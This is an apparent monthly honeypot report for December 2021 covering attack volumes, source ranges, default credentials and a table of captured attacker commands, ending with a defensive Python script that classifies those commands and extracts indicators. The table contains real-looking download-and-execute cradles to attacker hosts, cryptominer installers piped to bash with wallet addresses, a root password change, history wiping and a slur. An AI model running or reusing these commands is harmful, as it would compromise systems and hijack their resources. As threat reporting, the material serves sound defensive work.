December 2021

This month the honeypot was active until the 26th; after that it crashed, and it has now been restarted.

Between 8-12-2021 and 26-12-2021 we saw a steady trend until 24-12-21, when there was a sharp increase of 100% to just over 40,000 attacks.

We continue to see America dominating the attacks against our honeypot, with traffic from the ranges 8.21.11.xx and 8.37.43.xx. Both of these ranges are owned by Cloudflare, which shows that Cloudflare doesn't just protect end users: it also lets malicious actors cloak their servers.

We continue to see root:admin as the top username:password pair used to access the server.

We continue to see 96.43.128.70 as the main target; it has been the most-attacked IP for the last three months. Visiting http://96.43.128.70/ returns "file not found". Looking at the requests, they all target /multi/check.php and /multi/checkref.php; these URLs either do not exist or cannot be accessed from a browser.

Looking at the commands being run, we see the same types of commands as over the past few months, with the top command being echo -e "\x6F\x6B" (which simply prints "ok"). We continue to see a rise in mining-bot attacks: the majority of the commands attempted are related to a mining bot.

Count  CMD
513    echo -e "\x6F\x6B"
129    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
101    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
85     curl: option -L not recognized curl: try 'curl --help' or 'curl --manual' for more information
85     uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
72     pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; apt install dos2unix -y; yum install dos2unix -y; curl -O http://141.98.10.246/storytime/a; chmod 777 a; dos2unix a; ./a; rm -rf a; history -c; pkill Xorg; pkill cnrig; pkill x86_64; pkill x86; pkill java; pkill python; pkill screen
63     rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm x86_64
57     curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XKLDbSztdXqao2Rs2EFFLvdjsbRwYrP1FkqdqB91v1PohHdSSTjyeKQ4t6UMFXNdYpxkNhwpi9xTRmEsk6PeUSLHCfeLR
56     sudo hive-passwd `hostname`; echo `hostname`; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c
44     echo root:12wsafdsf4rwr234r32w|chpasswd|bash; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G
44     uname -s -v -n -r -m
42     cd /tmp || cd /run || cd /; wget http://23.95.222.119/obins.sh; chmod 777 obins.sh; sh obins.sh; tftp 23.95.222.119 -c get otftp1.sh; chmod 777 otftp1.sh; sh otftp1.sh; tftp -r otftp2.sh -g 23.95.222.119; chmod 777 otftp2.sh; sh otftp2.sh; rm -rf obins.sh otftp1.sh otftp2.sh; rm -rf *
40     perl /var/tmp/clamav.pl;rm -rf /var/tmp/clamav.pl
38     scp -t /var/tmp/clamav.pl
35     uname -a
33     curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
30     curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G
28     cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://sekinarh.tk/sh; curl -O http://sekinarh.tk/sh; chmod 777 sh; sh sh; tftp sekinarh.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g sekinarh.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
26     cat /etc/issue
2      wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo
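As an added example (not part of the original report), the Python below triages captured command lines like the ones above into the behaviour categories this month's data shows (liveness probe, fetch-and-run cradle, miner install, killing competing processes, history wiping, recon) and pulls out the download URLs and wallet addresses so they can be fed to a blocklist. The sample commands are constructed from the report's entries; the wallet address is a placeholder of the right shape, not a real one.

```python
import re
from collections import Counter

# Constructed sample of honeypot command lines modelled on those in this
# report; the wallet address is a constructed placeholder, not a real one.
FAKE_WALLET = "4" + "A" * 94  # same 95-char base58 shape as a Monero address
SAMPLE_COMMANDS = [
    'echo -e "\\x6F\\x6B"',
    "cd /tmp || cd /var/run || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; "
    "chmod 777 sh; sh sh; rm -rf sh",
    "pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/"
    f"setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s {FAKE_WALLET}; history -c",
    "uname -s -v -n -r -m",
    "cat /etc/issue",
]

URL_RE = re.compile(r"https?://[^\s;|'\"]+")
WALLET_RE = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")  # Monero primary-address shape
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")

# (label, predicate) pairs; one command may carry several labels.
RULES = [
    ("liveness-probe", lambda c: re.search(r"echo -e .?\\x6F\\x6B", c) is not None),  # prints "ok"
    ("download-cradle", lambda c: FETCH_RE.search(c) is not None and "chmod" in c),
    ("miner-install", lambda c: "xmrig" in c or "c3pool" in c or WALLET_RE.search(c) is not None),
    ("kill-competitors", lambda c: "pkill" in c),
    ("anti-forensics", lambda c: "history -c" in c),
    ("recon", lambda c: re.search(r"\b(uname|lspci)\b|cat /etc/issue", c) is not None),
]

def classify(cmd):
    """Return the set of behaviour labels matching one captured command."""
    return {label for label, pred in RULES if pred(cmd)} or {"unclassified"}

def extract_indicators(cmd):
    """Pull download URLs and wallet addresses out of a command for blocklisting."""
    return {"urls": list(dict.fromkeys(URL_RE.findall(cmd))), "wallets": WALLET_RE.findall(cmd)}

def summarise(commands):
    """Aggregate label counts and unique indicators over a batch of commands."""
    counts, urls, wallets = Counter(), {}, set()
    for cmd in commands:
        counts.update(classify(cmd))
        ind = extract_indicators(cmd)
        urls.update(dict.fromkeys(ind["urls"]))  # dict keeps first-seen order
        wallets.update(ind["wallets"])
    return counts, list(urls), wallets

if __name__ == "__main__":
    print(*summarise(SAMPLE_COMMANDS), sep="\n")
```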